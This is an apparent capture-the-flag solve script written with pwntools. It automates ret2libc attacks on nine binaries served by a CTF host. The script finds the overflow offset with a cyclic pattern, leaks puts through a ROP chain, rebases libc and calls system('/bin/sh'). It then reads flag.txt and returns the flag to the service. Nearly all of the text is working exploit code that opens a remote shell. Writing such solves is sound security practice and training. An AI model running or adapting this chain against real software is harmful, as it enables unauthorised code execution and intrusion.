#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host chal.b01lers.com --port 4001
from pwn import *
from IPython import embed
import codecs
# Set up pwntools for the correct architecture
# The libc and dynamic loader shipped with the challenge. libc.address is
# rebased later in the solve loop from a leaked puts() pointer; `ld` is not
# referenced anywhere else in this file as shown.
libc = ELF("./libc6_2.31-0ubuntu9_amd64.so")
ld = ELF("./ld-2.31.so")
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
# Connection target: HOST/PORT from the command line, falling back to the
# challenge defaults whenever the corresponding arg is empty or unset.
host = args.HOST if args.HOST else 'chal.b01lers.com'
port = int(args.PORT if args.PORT else 4001)
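def local(argv=None, *a, **kw):
    '''Execute the target binary locally.

    argv: extra command-line arguments appended after the binary path.
        None (the default) means no extra arguments; a mutable list is no
        longer used as the default so calls cannot share state.
    *a, **kw: passed through unchanged to gdb.debug() or process().

    Returns the pwntools tube of the started process. When the GDB flag is
    given on the command line the binary is started under gdb.debug().

    Both branches read the module-level `exe`, which is only assigned inside
    the solve loop below, and the GDB branch reads `gdbscript`, which is not
    defined in the visible part of this file; calling local() before those
    exist raises NameError.
    '''
    extra = [] if argv is None else list(argv)
    target = [exe] + extra
    if args.GDB:
        return gdb.debug(target, gdbscript=gdbscript, *a, **kw)
    return process(target, *a, **kw)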
def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host.

    argv, *a and **kw are accepted only for signature parity with local();
    they are ignored, the connection is made purely from the module-level
    host and port.
    '''
    return connect(host, port)
def start(argv=[], *a, **kw):
    '''Start the target; this script always talks to the remote service.'''
    tube = remote(argv, *a, **kw)
    return tube
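#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# The service hands out nine binaries in turn. For each one the loop below
# saves the bytes to ./bin, crashes a local copy with a cyclic pattern to
# learn the offset of the saved return address, leaks the address of puts
# from the remote process, rebases libc, runs system("/bin/sh"), reads
# flag.txt and sends the flag back to the service before the next round.
problem = 0
io = start()
# Discard four leading lines of output before the first problem.
io.recvline()
io.recvline()
io.recvline()
io.recvline()
while problem < 9:
    # The binary arrives as a Python bytes literal b'...': keep the text
    # between the opening quote and the last quote, then undo the escape
    # sequences. codecs.escape_decode is an undocumented CPython helper
    # (a bytes counterpart of the 'unicode_escape' codec).
    io.recvuntil("b")
    raw = io.recvuntil(": \n")
    raw = raw[1:raw.rfind(b"'")]
    b = codecs.escape_decode(raw)[0]
    # Context manager so the file is closed even if the write fails.
    with open('bin', 'wb') as f:
        f.write(b)
    exe = context.binary = ELF('bin')
    # Local crash run: send a de Bruijn pattern and map the faulting
    # address from the core file back to an offset in that pattern.
    p = process('./bin')
    base = 0x400000  # never read below; kept so the module namespace is unchanged
    main = exe.symbols['main']
    puts_plt = exe.plt['puts']
    puts_got = exe.got['puts']
    p.success("main address: {}".format(hex(main)))
    p.success("puts_plt address: {}".format(hex(puts_plt)))
    p.success("puts_got address: {}".format(hex(puts_got)))
    p.recvuntil(": \n")
    p.sendline(cyclic(0x80, n=8))
    p.recvall()
    core = p.corefile
    fault = cyclic_find(core.fault_addr, n=8)
    # Gadgets come from the challenge binary itself.
    rop = ROP(exe)
    pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
    ret = rop.find_gadget(['ret'])[0]
    # Round 1 against the remote process: puts(puts@got) prints the libc
    # address of puts, then control returns to main for a second input.
    leak_payload = flat({
        fault: [
            pop_rdi,
            puts_got,
            puts_plt,
            main,
        ]
    })
    io.sendline(leak_payload)
    io.recvuntil(('Got: \n', 'Hello, \n'))
    io.recvline()
    libc_leak = io.recvline()[:-1]
    # Rebase libc from the leaked pointer. Subtracting libc.address from the
    # symbol value presumably keeps the expression equal to the static
    # offset of puts even when libc.address was already set by an earlier
    # round — verify against pwntools' ELF.address semantics.
    libc.address = u64(libc_leak.ljust(8, b'\x00')) - (libc.symbols['puts'] - libc.address)
    bin_sh = next(libc.search(b'/bin/sh'))
    system = libc.symbols['system']
    io.success("libc address: {}".format(hex(libc.address)))
    io.success("/bin/sh address: {}".format(hex(bin_sh)))
    io.success("system address: {}".format(hex(system)))
    # Round 2: system("/bin/sh"). The leading 'ret' is presumably there for
    # stack alignment before the call; the page does not say.
    shell_payload = flat({
        fault: [
            ret,
            pop_rdi,
            bin_sh,
            system,
        ]
    })
    io.sendline(shell_payload)
    io.recvuntil(('Got: \n', 'Hello, \n'))
    io.recvline()
    # str arguments here are encoded to bytes by the pwntools tube.
    io.sendline('cat flag.txt')
    flag = io.recvuntil('}')
    io.success("Flag: {}".format(flag))
    io.sendline('exit')
    # The service prompts for the flag before handing out the next problem.
    io.recvuntil('flag>')
    io.sendline(flag)
    problem += 1
io.interactive()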